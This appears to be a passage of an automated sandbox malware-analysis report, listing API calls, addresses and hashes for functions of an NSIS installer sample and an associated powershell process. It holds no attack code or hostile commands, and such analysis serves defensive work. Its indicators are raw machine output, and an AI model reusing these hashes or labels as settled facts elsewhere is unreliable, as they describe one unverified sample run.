                                                                      • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                      • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
                                                                      • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                      • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98
                                                                      Function 0040652B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,007B5800,007B5800,007B3000,00403347,007B5800,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                      • CharNextW.USER32(?,00000000,007B5800,007B5800,007B3000,00403347,007B5800,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                      • CharPrevW.USER32(?,?,007B5800,007B5800,007B3000,00403347,007B5800,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: *?|<>/":
                                                                      • API String ID: 589700163-165019052
                                                                      • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                      • Instruction ID: 354a4add7e9ac5ce680480da4fd3ed99b8030fd96c8c1ffbe99f836226306b46
                                                                      • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                      • Instruction Fuzzy Hash: 4511B655800612A5DF303B14AD44A7772F8EF547A0F56443FE985733C4E77C5C9286AD
                                                                      Function 00405C17 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharNextW.USER32(?,?,?,?,004015D1,00000000,000000F0), ref: 00405C25
                                                                      • CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C2A
                                                                      • CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C42
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext
                                                                      • String ID: :$\
                                                                      • API String ID: 3213498283-1166558509
                                                                      • Opcode ID: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                      • Instruction ID: 6a9d977fbe5713998eb834b7ad01fe533960ca492682b5c2b36711c34b001c28
                                                                      • Opcode Fuzzy Hash: 92222cf075acf2fbc044c76267536a24963eff6ee4d7f8d65295f56b9dd724d0
                                                                      • Instruction Fuzzy Hash: DDF0F061808B1095FB3176644C88E7B66BCEB55360B04803BE641B72C0D3B84DC18EAA
                                                                      Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrcatW.KERNEL32(00000000,00000000,0040A5A8,007B4000,?,?,00000031), ref: 004017B0
                                                                      • CompareFileTime.KERNEL32(-00000014,?,0040A5A8,0040A5A8,00000000,00000000,0040A5A8,007B4000,?,?,00000031), ref: 004017D5
                                                                        • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                        • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00), ref: 00405337
                                                                        • Part of subcall function 004052FF: lstrlenW.KERNEL32(?,007A0F00), ref: 00405347
                                                                        • Part of subcall function 004052FF: lstrcatW.KERNEL32(007A0F00,?,?,007A0F00), ref: 0040535A
                                                                        • Part of subcall function 004052FF: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                      • String ID:
                                                                      • API String ID: 1941528284-0
                                                                      • Opcode ID: 58fdc18d76f7bcf16c6fce6c3f21aaeb4e3bf1edbc87f50fc288292bb51d9b5e
                                                                      • Instruction ID: 2a95d3c8b727dc51f4ea131d05094547f585338353aa12d45a2270be549af1c7
                                                                      • Opcode Fuzzy Hash: 58fdc18d76f7bcf16c6fce6c3f21aaeb4e3bf1edbc87f50fc288292bb51d9b5e
                                                                      • Instruction Fuzzy Hash: C141B471910514BACF107BA5DD45DAF3A79EF45328B20823FF512B10E1DB3C4A519B6E
                                                                      Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401DBC
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                      • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID:
                                                                      • API String ID: 3808545654-0
                                                                      • Opcode ID: 2e8c6812557a8000d290618689d5c167272f7de43d41522ca2a47e16c60e8740
                                                                      • Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
                                                                      • Opcode Fuzzy Hash: 2e8c6812557a8000d290618689d5c167272f7de43d41522ca2a47e16c60e8740
                                                                      • Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                      Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                      • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: 2a08160353212a6e5352d7991a9f72d4257b9bf0db71b279ef6b12194f0acfdb
                                                                      • Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
                                                                      • Opcode Fuzzy Hash: 2a08160353212a6e5352d7991a9f72d4257b9bf0db71b279ef6b12194f0acfdb
                                                                      • Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38
                                                                      Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Timeout
                                                                      • String ID: !
                                                                      • API String ID: 1777923405-2657877971
                                                                      • Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                      • Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
                                                                      • Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                      • Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18
                                                                      Function 00404ABB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                      • wsprintfW.USER32 ref: 00404B65
                                                                      • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s
                                                                      • API String ID: 3540041739-3551169577
                                                                      • Opcode ID: 659e19d517a3b0c3334d5d290c3650de3f4e6e8c213cad244c2b0995072c2ab2
                                                                      • Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
                                                                      • Opcode Fuzzy Hash: 659e19d517a3b0c3334d5d290c3650de3f4e6e8c213cad244c2b0995072c2ab2
                                                                      • Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
                                                                      Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Close$Enum
                                                                      • String ID:
                                                                      • API String ID: 464197530-0
                                                                      • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                      • Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
                                                                      • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                      • Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
                                                                      Function 004057CE Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405811
                                                                      • GetLastError.KERNEL32 ref: 00405825
                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
                                                                      • GetLastError.KERNEL32 ref: 00405844
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                      • String ID:
                                                                      • API String ID: 3449924974-0
                                                                      • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                      • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                                                      • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                      • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9
                                                                      Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,00000000,00403059,?,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                      • GetTickCount.KERNEL32 ref: 00402EAA
                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                      • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                      • String ID:
                                                                      • API String ID: 2102729457-0
                                                                      • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                      • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
                                                                      • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                      • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
                                                                      Function 00405C74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(?,?,?,?,004015D1,00000000,000000F0), ref: 00405C25
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C2A
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C42
                                                                      • lstrlenW.KERNEL32(007A4728,00000000,007A4728,007A4728,?,?,?,004059C9,?), ref: 00405CCD
                                                                      • GetFileAttributesW.KERNEL32(007A4728,007A4728,007A4728,007A4728,007A4728,007A4728,00000000,007A4728,007A4728,?,?,?,004059C9,?), ref: 00405CDD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: (Gz
                                                                      • API String ID: 3248276644-3338112938
                                                                      • Opcode ID: a52dea6f46491884bfea8966144719ff55b77873c2b9e35538818f57ee0f9f4e
                                                                      • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
                                                                      • Opcode Fuzzy Hash: a52dea6f46491884bfea8966144719ff55b77873c2b9e35538818f57ee0f9f4e
                                                                      • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
                                                                      Function 00405273 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 004052A2
                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004052F3
                                                                        • Part of subcall function 0040425A: SendMessageW.USER32(?,?,00000000,00000000), ref: 0040426C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                      • Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
                                                                      • Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                      • Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E
                                                                      Function 00405DBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00405DDA
                                                                      • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,007B3000,0040336A,007B5000,007B5800,007B5800,007B5800,007B5800,007B5800,774D3420,004035B6), ref: 00405DF5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: nsa
                                                                      • API String ID: 1716503409-2209301699
                                                                      • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                      • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                      • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                      • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4
                                                                      Function 00405CF2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
                                                                      • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D2B
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D34
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                      • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
                                                                      • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                      • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8

                                                                      Executed Functions

                                                                      Function 02D9B490 Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1739897719.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_2d90000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: {YIp^$YIp^
                                                                      • API String ID: 0-2571092133
                                                                      • Opcode ID: 78e35213b8028ad64a993874c1972fc9f638a9e7f2ff5157f5b7685323419f16
                                                                      • Instruction ID: 028daa2c9f99f9d82405638caf87732fb00ae49da1525cc9ceab46584bd73da6
                                                                      • Opcode Fuzzy Hash: 78e35213b8028ad64a993874c1972fc9f638a9e7f2ff5157f5b7685323419f16
                                                                      • Instruction Fuzzy Hash: 09915E76B406145FDB19DBB98410AAFBBE2FFC4B00B44896DE056AB340DF346E058BD6
                                                                      Function 07402308 Relevance: 10.6, Strings: 8, Instructions: 647COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.1746245921.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_7400000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: J2k$J2k$J2k$J2k$J2k$J2k$r1k$r1k
                                                                      • API String ID: 0-1679444440
                                                                      • Opcode ID: f4e4a71b78c45317b72399bf3e009023a368717c2203181514399ab8e95b3f1d
                                                                      • Instruction ID: fdad0d8eec81336b31f919d9f3849ada713a4e37cf12af199207e3fa8dfce964
                                                                      • Opcode Fuzzy Hash: f4e4a71b78c45317b72399bf3e009023a368717c2203181514399ab8e95b3f1d
                                                                      • Instruction Fuzzy Hash: 1F22F4B5B002069FDB158F6888487ABB7E1BF86210F1484BBD545CB3D1DBB5D941CBE1
                                                                      Function 02D9E5B9 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                      Download Yara Rule
                                                                      Strings
